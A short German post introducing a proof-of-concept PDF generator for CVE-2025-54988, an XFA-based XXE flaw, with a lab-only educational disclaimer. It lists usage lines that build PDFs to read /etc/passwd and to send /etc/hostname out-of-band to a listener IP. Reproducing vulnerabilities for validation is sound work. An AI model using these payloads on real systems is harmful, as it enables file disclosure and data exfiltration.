
Ein PDF-Generator für CVE-2025-54988
Haftungsausschluss: Ich bin nicht der ursprüngliche Entdecker dieser Schwachstelle. Dieser Beitrag dokumentiert meinen Prozess der Reproduktion des Problems in einer kontrollierten Umgebung zu Bildungszwecken und um anderen zu helfen, ihre eigenen Systeme zu validieren. Die Tests wurden in einem isolierten Labor ohne Auswirkungen auf Produktionssysteme durchgeführt.
Verwendung:
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
